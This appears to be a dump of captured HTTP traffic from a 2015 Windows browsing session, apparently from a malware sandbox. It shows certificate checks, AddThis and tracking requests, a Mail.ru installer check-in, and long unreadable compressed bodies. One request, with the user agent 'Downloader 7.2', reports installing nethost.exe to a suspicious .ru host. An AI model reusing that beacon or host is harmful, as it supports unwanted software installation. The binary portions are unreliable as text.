.....w.......72.25.!.K.}.......vc..?...Y.........S.M._..[........0..0.
..U....0.0...U...........0...U.%..0... .......0... .....0......0...U..
......1..aq.....P%]....<0...U.#..0...]F...Kt....s.:.8.u.~0...*.H...
...............YJ....KU1... g...N.a.?"Z......>O..o .G~..U.H......k.
.7.(nz/......"u..#. .m!.k.HjZ.3..G.J.9....i.................i.....4>
;...!.c..U...Du...x...0.....6..@u....&.......4<./..[...M.f....o.<
;.....o6.s"w.L....#..4~./.u..v.i.y.=.gR_=.sm.;iK.0.w..g......oq..)<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2+iPob4twryIF+FfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa/LgCEBBwnU/1VAjXMGAB2OqRdbs= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.usertrust.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:36:15 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Sun, 22 Feb 2015 14:28:55 GMT

Expires: Thu, 26 Feb 2015 14:28:55 GMT

ETag: 62C0D8381FCA95D86A818D389FB2311EFFB2EDB8

Cache-Control: max-age=276159,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: h6edcaocsp7

Content-Length: 471

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0...... .F....e*F.yG.b.......2015022
2142855Z0s0q0I0... ........m..Lco.>..... _.~..... .F....e*F.yG.b...
.....p.O.T..0`....u.....20150222142855Z....20150226142855Z0...*.H.....
........P....5pp.TZ.O^>.#..M...>L.....>s...6..q...*.5..0.O.Sl
J.................D.........G...2..v..........8.N.>r...;..S....v..!
.......semL.h.t...E../.0@.....?CD.u......W..L..$ ..^.80.BRe)......l..g
I..TT_*.o.....S.Yd..<;..1>....P.,.....@...y.......W..6 B.lf8..I.
0J..

GET /b?c1=7&c2=2000001&c3=1&rn=1uaxbdb&c7=http://go.mail.ru/?osd=1&c8=ÐŸÐ¾Ð¸ÑÐº Mail.Ru&cv=1.7 HTTP/1.1

Host: b.scorecardresearch.com

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://s7.addthis.com/static/r07/sh200.html

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: UID=120c9bfd-194.221.64.106-1384780341; UIDR=1384780341


HTTP/1.1 204 No Content

Content-Length: 0

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive

Set-Cookie: UID=120c9bfd-194.221.64.106-1384780341; expires=Sun, 12-Feb-2017 09:35:36 GMT; path=/; domain=.scorecardresearch.com

Set-Cookie: UIDR=1424684136; expires=Sun, 12-Feb-2017 09:35:36 GMT; path=/; domain=.scorecardresearch.com

Pragma: no-cache

Expires: Mon, 01 Jan 1990 00:00:00 GMT

Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
HTTP/1.1 204 No Content..Content-Length: 0..Date: Mon, 23 Feb 2015 09:
35:36 GMT..Connection: keep-alive..Set-Cookie: UID=120c9bfd-194.221.64
.106-1384780341; expires=Sun, 12-Feb-2017 09:35:36 GMT; path=/; domain
=.scorecardresearch.com..Set-Cookie: UIDR=1424684136; expires=Sun, 12-
Feb-2017 09:35:36 GMT; path=/; domain=.scorecardresearch.com..Pragma: 
no-cache..Expires: Mon, 01 Jan 1990 00:00:00 GMT..Cache-Control: priva
te, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate..
....

GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com


HTTP/1.1 200 OK

Content-Type: application/pkix-crl

Last-Modified: Wed, 28 Jan 2015 06:05:55 GMT

Accept-Ranges: bytes

ETag: "75565c7ac03ad01:0"

Server: Microsoft-IIS/8.0

VTag: 791863242700000000

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

Content-Length: 554

Cache-Control: max-age=900

Date: Mon, 23 Feb 2015 09:36:15 GMT

Connection: keep-alive

0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Microsoft Corporation1#0!..U....Microsoft Code Si
gning PCA..150127173215Z..150428055215Z.a0_0...U.#..0..........X..7.3.
..L...0... .....7.........0...U......Y0... .....7......150427174215Z0.
..*.H......................YIw.. ..(..y..O.G].B.."?.@...[1.}.X...]...e
.J....pP.I....!6...%.D.k...>c.|R.?.i..yt.z..B.........b....n..m5...
0....2..I!)v....z....y.#pXz.DO.....mF...e.'e...@.%...6./.bPZ...=....bp
..j....lo....4........T9j...S.7Q.@.W..@.. ...M....z....Q...{u. .W....

GET /js/300/addthis_widget.js HTTP/1.1

Host: s7.addthis.com

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Thu, 19 Feb 2015 18:36:30 GMT

ETag: "6381035-2a40-50f7536e70381"

Content-Encoding: gzip

Content-Type: text/javascript

Content-Length: 4192

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:35:33 GMT

Via: 1.1 varnish

Age: 2926

Connection: keep-alive

X-Referer-Domain: hXXp://go.mail.ru

X-Host: s7.addthis.com

X-Served-By: cache-fra1226-FRA

X-Cache: HIT

X-Cache-Hits: 200585

X-Timer: S1424684133.994928,VS0,VE0

Vary: Accept-Encoding
.............w......2....LQ...TY..I;oi.......Q$$!.....1Y....AQ...m.{1.
..p./........3..W..hp....?,.$..2.|...m*:i. ..d..w...sKE|.E...OG.....eG
..H..M..~Jx.as.HN..iQ..i..s.^...5.....WL.n.6F8.w.Y ..D..`..(@x.`....yR
...[!....iYr...2..x^.........x.H-....a.s.x?^.........n........[..J..dC
..\(.o....a.M.,-...-.....lP&.p0.....*|9.....".....m-.....9... .D^$M.Q.
...Z..r..z.....fa.o..d.-.._.{a..U..T.... ..;...k.".....W.....Kho.d....
p;%...........U.......Bk..]3\....~2..D&{. ..2.`.4....oR."..c'rM;.....=
..N..a.X.....--.H.,.T..=n...b.6....pC...#...wB...Zp.q..,XF.9.bQ.pQ..$K
.IiM.x0.e.H`..T....I.|o.......|...&....:.....&"........P8..L.K...K.#(&
gt;]P.....CX...6..7.j..k...R.<.....UK.....2.).1...Rd`R...b.. ..F)J.
..~.@.c...A..d.....' ...,..}.......~.i..N...=.jN...96..w...M..C .....J
.....f..f..\&l"`C.r.P_.2.B,T....w...e..3u.......Zo..1U.P. ....0.a.pTv.
.r.S..:7....oe........Hh..*...F. .........l.x..D.b..I}.l.TeK..gH..#.^.
l.H...)..D....OD..i..Z.a9..}...m?.'......T..>%..B..[.......$....S4.
....#..J.....u/MW..Z........>Kj..!..-...jM......O....i3^...F`i..w..
.?.....l[.D....4!ZX`..m.6..h1................be.}..J.. S...6.^...&Zi21
KU....G.W. @.&p...!......[..i..YC...7....C.<....l.S6.S........A....
.jl...T.{.~.....8.....Z\`....Y.....9.V:.........#......L......R...d..4
........{.S...@^. vO.8...?.hi%.........4.......`..W.pT.M<M.%.Y...,.
.gZ.#......Bf...!y.....g..W}...VYBKL.~...5_A..i...&..00...g.8".....U..
...^......,"...G!....#.].T|.Ed...q8<#.6.$.....$7....5...3...9....(.
..G*...n.L.'W.G.....#...E:..G;....M:#.K....7..-..3.?.R.)..J..."z.w<<< skipped >>>

GET /static/r07/core201.js HTTP/1.1

Host: s7.addthis.com

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Wed, 18 Feb 2015 15:34:19 GMT

Content-Encoding: gzip

Cache-Control: public, no-check, max-age=86313600

Content-Type: text/javascript

Content-Length: 75495

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:35:34 GMT

Via: 1.1 varnish

Age: 410339

Connection: keep-alive

X-Host: s7.addthis.com

X-Served-By: cache-fra1226-FRA

X-Cache: HIT

X-Cache-Hits: 22743221

X-Timer: S1424684134.971192,VS0,VE0

Vary: Accept-Encoding
.............~.F.(....BB.e .(R.-...eYN..-.%'..........4.Q...>.9...5
T.. $;.{.......Q..5.ZS......[......n...q....(.7.$...;.csR&~...Fh.vbG..
....N..hbn&..%...]{....2....."L'.Y....pkK..X&....,,.,...........D..Z.I
..8..43.c/I.bc.%..<..8.xbt.......,K..e.O..5......d...|.....W.].....
..w.."....[......e......"...1C.`.R...Ex9.M..d.8...c.*..<v ..?).W...
V.}.x.....?E.8L..l.w:VfF8... ...\T...m.T..73....e..........^,;.......O
-...-.lm.y.E..j.J1G^.v..M..8..o.\..%.knW.....n.".7a.|..g...V..u.E...10
..}.>..P(8....m..a........v..a.xq7...[F.Q.%.....:.V#.......`...m...
...H.S!.dX.....Tv..cr....t=X... Z........|3.V.j..Vj."1..M..w..i.~.-.hR
.3.S"[......#hM....`..)L~..l.)V..Qxs:1.x...-.`.....a...om..H/..|.r0=U.
eA......F..S.Q.3/.i....H.../.}.2o..f....[d......f.$....3.k.D .....~9.l
v.............?}|s...i..%....{..N..g7Z...OW..ns ..s_.e.%.4..C..oS/8].;
...Xo.E.. ,[.P.N.......w`...4......xM..0{.A..2....'....i............:.
.C_sv.........[Im.}.........M.J.......=.....-....K...)-........I....$.
.......]...Y...C..!.].....N.^.Y...4.'........4-.2*B..s/..../..^.._....
...3/..........k..(......G.&`..e.F.-wv...g..a84`q..F.......j..l~..Wc..
.xI.hr.Y...$..&......s.*<......zb....e..................3...E.&...=
H[..YX...".|.".V.T.7]w..._K.....2...!.B}..D/z.1....t.f.^....a..b..=...
...............@%.Y`......y4...0...D........2..yb.a..5........v.^.0[..
^.*..#s..fb9..eRM.....J........?....<.....<..ex..2..0..i.......6
.Z.~....0j'.'a.!..9...Q~.z.?...."...9 R..|<9>........_...,.....Q
.S....A=]8...Oc...P..a3.......I2.{..L.8.Q........7....~-^,{..T..p.<<< skipped >>>

GET /static/r07/widget/css/widget015.top.svg.css HTTP/1.1

Host: s7.addthis.com

Connection: keep-alive

Accept: text/css,*/*;q=0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Wed, 18 Feb 2015 15:34:19 GMT

Content-Encoding: gzip

Cache-Control: public, no-check, max-age=86313600

Content-Type: text/css

Content-Length: 41208

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:35:35 GMT

Via: 1.1 varnish

Age: 410339

Connection: keep-alive

X-Host: s7.addthis.com

X-Served-By: cache-fra1226-FRA

X-Cache: HIT

X-Cache-Hits: 20940894

X-Timer: S1424684135.535992,VS0,VE0

Vary: Accept-Encoding
............is.H.5......s.qO?.J@b..s...5..m.K.EQ$%R.E.....o..w..$.....
.......D................:.A....].....?..:......~.a..c......m^...c.j...
.......V{$./...U.._.?.....}......w..._v..?..z.3z.}.........k.f?.l.....
.x.......S...}.[.~o.m......h.....}..{....>.4>..;.A.~T...K~..C.7.
..n.>..p..P.....A|........].............._5.m....?z..V..n..WW......
M.x.'4q7.>j>.J.n.u.{.y7j..n,o#.<}...pP/iB{..0...16|.l...|&...
...~o....... n.w;.........2z.......eS..]o(...p.Z?.k...5{..~DC....}.C.n
.0r{..........t].u.....;..o.fw.............^_......w...y...>.60..4.
.......0.}....nS...%o...|q.............. ......63&..|.yj^.v.....~.....
7.4c7z......5..5b..}2.......U}T.............f....\98~.v6Z......Y.v..&.
.T......7..a...../.......2...G...F..8.l_~Y.....=.r.5...!~P.m.........F
.U.(..7..Z....y{s..Z...5.Z......o.....YT...n.Z.... L...6..........a...
..U4x..0.!-...>..u.......w.3.......Ewt/.........EX.4.....cg/.} >
U>.W.K^lO..v...}s..m.V.X~.V.}.-.........T.su.........^....Sm<...
...;.V...l.;.?...........o3...V.,?..y].....0*...?........y......e...x\
{..I..]..w..*0Kze.'.....^. .w.$.....^q.l..W.wY..x...._....^y.^y.....jF
..4:...n.~.....vL_V....d...W........ .....~..f~...-..0.Tc.....i_.G...r
0'...JV.4.:=.....-......R.......c.,.g.sQ..u.k..j...nO.zIC.R{.R.3.->
...mat.Tjv.=......}.n...w.E..... ........_=.r..rk...zk7....N..E..7....
...o.....e-v...U..wf...g..>.........Uh}....u.>p.[ .o....D..ov.E.
.?..3........*..R...h.......OTl..3.....__eY..,m..]E....g..........yS/b
......U..D.-lG...i^q...wX x^2hU.......B.xG.I.s.,...S..h..2m/.....Z<<< skipped >>>

GET /static/r07/menu174.js HTTP/1.1

Host: s7.addthis.com

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Wed, 18 Feb 2015 15:34:19 GMT

Content-Encoding: gzip

Cache-Control: public, no-check, max-age=86313600

Content-Type: text/javascript

Content-Length: 20320

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:35:35 GMT

Via: 1.1 varnish

Age: 410339

Connection: keep-alive

X-Host: s7.addthis.com

X-Served-By: cache-fra1226-FRA

X-Cache: HIT

X-Cache-Hits: 18850170

X-Timer: S1424684135.704891,VS0,VE0

Vary: Accept-Encoding
............}..6.0......c. X..8m...&M.l.6.d..:^]..$....._b.~.;3x!@QN..
9......".F`0.......:..8K...S.-.zwyT..........M.:l..A.D.0.......".;8p..
r..`.mu{.... ..J......l...z..zXo6.xJF.....2...w.o....................6
.3u.'.......8pT7. (oWQ6kE..z2...../K.sg].|y...1w....FI|.....p..n...V.A
W. H....;.aP.:F..P..Mx.....`R....h.rVzw..,.S...:......<*...5k......
5x.U......A..Wo.../....u..3lM.%...^..$.z.".9.........\..|f. |......&.y
wE...b=.lb.c.pr.$..V.a....fs..zS^.....b..8KeO.......T....it.....e."*..
x. .G..u....=.<6...2JK.zN...)......ze...O..y..].@..7...T..A..C.....
V.....5K..P-...z.`.L/..0".^/.5.^....W...A\....*(..|.......c{.7.6b<p
....1{.9kXJ.8...b..G..U...&...n..^...r1.u....G.....'.B...@.........._.
p..(........$.].<.W,...ge..3....V..%.P..,/.j..k*........h}.}).p...7
<X.....J..n........<..]...k...X..T"...F.z.....w........@...H..:.
z.=..........:.Z....f......a.&.D-.Y...z...&SMB.!.$.l=....G.....(%...E 
......sN.Ab..6...{...s,f....s.g.;.......p.if. .)............V..L,.....
n~..`.v~>.1.....S.(...".l.1M.0.%.'.0U..s.X.,..@9...&.Jl6.....;bt...
.........Q.(.r....O...o........Y.4u.j5.m?...8b...D..../....A...i..$.'.
Vp....2..~..$.3..d|y.......E..... ...R..7.)...xU.....h..-.....p..4..`.
."....)4.....:ua52.,.ii.d.."......{_.trp.....(..O0`...F<X.&.T.U}...
..<..u.-......6.......(~p....L9H...k......B"b..........6,...2.O....
6.Ya..e........FS...]..|..e.F hJ...i..)OH0...p.i.Y...!zU4;.YSy...n..D.
F.P%}...0U..R)...0..9.......ZI-....~{.v....z[.....!.ZJ.].._(L(G..G....
{..............FG.&.... ...#....z.2Nz.<[....E-..d)......gI.RJ..<<< skipped >>>

GET /launch_install?name=nethost.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=2d84e2b0951fc5429e36666fbea994a540c103d2f71235ccaa45e036691ac29a&md5=37500ff6fc6c395916e1b7227b8791c8&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:33:17 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:33:17 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /sputnik/spmrids.mrdj?osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&tool=sputnik&guid=&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=9 HTTP/1.1

Host: xml.binupdate.mail.ru

Accept: */*

User-Agent: SputnikInstaller

Connection: close


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-mrd

Connection: close

Content-Transfer-Encoding: 8bit

Content-Length: 1564
d.=<;:;\ds7.3i.0/.-, *)*Feqqbn#:..WY__US_W[QU_R^_O]\MBHKODUJOJNM>
;7.pQzyxwvutsp.&=.5%..:..51fyb.J_^]\[ZYXWVUTQ.........................
......................................................................
...................................................?>=>Ni|Hvbv|z
|v25.y~~o%.'&%$#"! .kOP...._BAD...H[@@MBF[].EAJNCHLq,(s<5.;?.!:g|f*
mDmlkj4dMfedc`.0]D].qZYXWVUTSP0.....IPIJ..............................
......................................................................
...................................zwp~qtxzxy{}c{pqdah`)&.('&%$#"! ...
.RWRU_TWSYUZRD^LFFDOMBDAKGDBE3391yPyxwvutsr.|Enmlkjihgd.7&. 4.....XCX.
..._xQPONMLKJK=..G^C@.................................................
......................................................................
..........?<Rji_aq^rfXzae25.V. *)('&%$#"! .V^RXPI_VXS[PPW_J@LIFKNBM
IUOHKOD/|qV{zyxwvutsrqpm-!</-$,," -)(#'.................LAfKJIHGFED
CBA@..................................................................
.............................................................xv?0.:987
6543210/,idembx`bgtainpQZQLPSZ^V_SRCZU[MA..!............|;0460989<?
=>:?")$//%-)*",,-* '.._PqZYXWVUTSRQPOL.............................
......................................................................
..........................................o$23cnwuv.yff<rtacleg${}(
aj[`jwbR...A.3....I.8...hkiS^LFTOJJP...$T}|{z{...%!'<8;mtm7Ajihgfef
.0-bE^_....BXY.........B.......J..N...................................
..................................................................<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=340814, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 08:12:19 GMT

Expires: Fri, 27 Feb 2015 08:12:19 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
0081219Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U....:.q..E...0.xa......20150220081219Z....20150227081219Z0...*.H.....
........./Ql[......[d"|...).hW.,5....U.ez.v?R.v&?.r....=..i...'.....V.
h_R.0...|.N.bI.5.b.K.:$K.[B......f.....u$=@.6.GE..J..*C.o!..hD.(<.\
...vC]X.@.r6.B......\.. .,.L..%..p....I.>....).y!...c.K:?....xS7^..
]..# .......2]..U......(...bq..........V>..},^.G................0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /static/r07/sh200.html HTTP/1.1

Host: s7.addthis.com

Connection: keep-alive

Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Fri, 13 Feb 2015 18:50:40 GMT

Content-Encoding: gzip

Cache-Control: public, no-check, max-age=86313600

P3P: CP="NON ADM OUR DEV IND COM STA"

Content-Type: text/html; charset=UTF-8

Content-Length: 22019

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:35:35 GMT

Via: 1.1 varnish

Age: 830624

Connection: keep-alive

X-Host: s7.addthis.com

X-Served-By: cache-fra1229-FRA

X-Cache: HIT

X-Cache-Hits: 44439382

X-Timer: S1424684135.764232,VS0,VE0

Vary: Accept-Encoding
...........}k{.F......f...!....!>..3.....Nf.....h..@..E.,...z....I%
...o...}G_...../..}.......hY....~..wo_.Y'..?...............;.F...e.UI.
.Y...o.YG.....<^.....Q^.......-..U..6j..:.._..nWiV..Z.^.x! [(..a..,
.YGm...a|..N.T.......:j.$M...y......|9.Egy|wT.w...Y.]/.....(O...>.a
)..:..4...*..v..[UT&E}T..T.....sx..T.|...................,.h...}..q...
v....s.....)E...QxF..(..:."...^.ex....Td.z9.X.%.8@W.L........2..Y...yP
_L..........t.@..0M..Z...n....H q.......n....t .......j............iN.
..We.Q).4...............x.Z.3..Z7..#.L...t.......K...q..v.!. .."......
l....lQ =....4X'Y..Gi..h..'T>....#......5ORa9..C.U8.....*..i1~.l.,.
.0.:.......[CD...;...yUg..]..n.dKU.0..s.4.hi...(.0...d..y9j*Q.Z.$....|
-..a%l...8...e.k5.n..5..==*...o.W...q......{*..e.j<.EU.M...E.z..GOF
^.....N.zyu......H..3.,..K..h.V.mV.*.........x$nE.B."/h...9..Q;..v..e.
].DZ....]......O.>{~.9..;F..X.c..g.7...c.X\RsaF?...Fm=.;.P.!.....q.
X.]....r.....N.....fw..b....O..O..^Nf..................7..~<.b...O.
..J.......L.?.I.......P./v.....&.9.?&\......?C.d....N.*'....n...,.F...
....0..L........,.TIz..Z...o....... a.....S.-......8u.........w&..4..Y
#...*.T.-..... ..xM{....U...".L`[......D.|.2..7.(.cqi9n.V..4.5.U..:...
8..-W..6.@(......U.~[...t..V.Q.U~#d..fM...B!.PS.co..]=.W..x.....z9"...
 ..g:............x?3..J...Nf5.5....m...o.........z?.h3.C..['..F...u...
....W...u.f..P.......V..m.X....'...._..Kw.VK..~...=.G. ......M*....EF.
.Q.../w...;.l.j.........4h!.*#..ho1.W!...j..&Lm....#kH5..n........h...
E.~.YD..{.8#...0Zv=`n...rlF..n...v........c...!..#0p..<.n..K..d<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=474265, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 21:17:36 GMT

Expires: Sat, 28 Feb 2015 21:17:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
1211736Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U..."^..X..H..c.=d......20150221211736Z....20150228211736Z0...*.H.....
.........k....?y..G.M.....l..&.......m.....I|....uC.b3.Q..<Ta.{NP.I
R<............z....L.k..Q...q..;Q.`%.I..y.....,JS.-..2.#.....3.....
.].......{<.%.......@..m....d....M..'...z...6.nb.....2{d.-p.G7...?*
u0.......gNu...Q.!.k..Wv ...h.,...*j..1..........b..s....d.Y.n.....0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /?rmvSB=true HTTP/1.1

Host: VVV.ebay.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

X-EBAY-C-REQUEST-ID: ri=A07N3d2lT8k=,rci=8sHeD7HySAk=

RlogId: t6e`cckjkb9?uk`1d71f+6a4e-14bb5c7244e-0xa2

X-Frame-Options: SAMEORIGIN

X-Frame-Options: SAMEORIGIN

Content-Encoding: gzip

Cache-Control: private

Pragma: no-cache

Content-Type: text/html;charset=utf-8

Content-Language: en-US

Date: Mon, 23 Feb 2015 09:31:42 GMT

Transfer-Encoding:  chunked

Connection: keep-alive

Vary: Accept-Encoding

Connection: Transfer-Encoding

Set-Cookie: JSESSIONID=835403A85374F1AE7BAEE3D54572EA69; Path=/; HttpOnly

Set-Cookie: ebay=^sbf=#^;Domain=.ebay.com;Path=/

Set-Cookie: dp1=bu1p/QEBfX0BAX19AQA**56cc26fe^bl/UA58ad5a7e^;Domain=.ebay.com;Expires=Wed, 22-Feb-2017 09:31:42 GMT;Path=/

Set-Cookie: s=CgAD4ACBU7ET YjVjNzI0MjgxNGIwYTZhNGIzZDdiYjhjZmZlNTUzYTLoa5za;Domain=.ebay.com;Path=/; HttpOnly

Set-Cookie: nonsession=CgADLAAFU6vqGMQDKACBeUPT YjVjNzI0MjgxNGIwYTZhNGIzZDdiYjhjZmZlNTUzYTIEMe94;Domain=.ebay.com;Expires=Tue, 23-Feb-2016 09:31:42 GMT;Path=/ 
000018C8...............v... ...Z..Q....]..."..j.....@:3O.v.R....50.N.u
....k...G.Orw...A..L..sU. ....C.;~.........Z^.<..g....@....(..y.;}.
4...~. ..2..... ...A,.h...F5.W./QM....Q.0[..R..&...._?........[......?
..?.UTu...b...[...*......E=,.C.?a......T..W.".b..a...7x...:....Ron2.O.
0....~......~.....L...UV.~F.A;Pg7.......z]W3.U.6...U.|...v.M.j..Y.....
....,.........V.....^.C6.`..=R...;.8..f..?.t.-.y6j.....a..k.....up..1.
...Xuk......~b..`..wWs..w....O..$gV.F..O....2a .. ...F...H=[..n....4.p
.q.so.6.o..S8.im.= %<..:......'o_......JjaW,.b.~...............(.y.
>.TyW.....r*-)..<_..o..#..m'.%.QRv..@..<....%G{....Ui-Q.iyIe.
......B^...BN..w.'...(.T....*..-...]S....qB]..!......}.3l.]@......(..{
